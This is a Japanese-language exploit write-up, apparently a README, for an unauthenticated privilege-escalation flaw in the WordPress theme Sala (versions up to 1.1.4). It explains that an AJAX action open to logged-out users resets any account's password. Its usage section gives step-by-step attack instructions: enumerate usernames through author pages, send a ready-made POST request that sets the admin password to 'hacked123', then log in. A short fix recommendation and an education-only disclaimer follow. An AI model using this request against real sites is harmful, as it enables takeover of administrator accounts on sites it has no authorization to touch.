
🔥 脆弱性の概要
WordPressテーマSalaのバージョン <= 1.1.4 は、未認証の権限昇格 の脆弱性の影響を受けます。この欠陥により、未認証の攻撃者 は、リクエスト元の本人確認を行わずに公開されているAJAXエンドポイントを直接呼び出すことで、管理者を含む任意のユーザーのパスワードをリセットできます。
この脆弱性は、wp_ajax_nopriv_ に登録されている change_password_ajax 関数に起因します。この関数は、リクエストが承認されているかどうかを確認せずに、任意の有効なユーザーログインに対して新しいパスワードを設定します。
🔍 影響を受けるテーマ
🧪 エクスプロイトの特徴
/wp-admin/admin-ajax.php?action=change_password_ajax🧠 研究者
🚀 使用方法
ターゲットのWordPressサイトで有効なユーザー名を特定します。これは以下の方法で確認できます:
/author/username)以下のPOSTリクエストを作成して、ユーザーのパスワードをリセットします:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
成功した場合、上記の例の新しいパスワード(hacked123)を使用して、対象のユーザーとしてログインできます。
/wp-login.php にアクセスして、ログインできることを確認します。
🛠 修正の推奨事項
wp_ajax_nopriv_change_password_ajax フックを削除するか、セキュリティを強化する必要があります。is_user_logged_in() を確認し、ユーザーの本人確認を行う必要があります。🔒 免責事項:
この情報は、教育および許可されたペネトレーションテストの目的のみで提供されています。システムの不正な悪用は違法かつ非倫理的です。
📚 参考情報: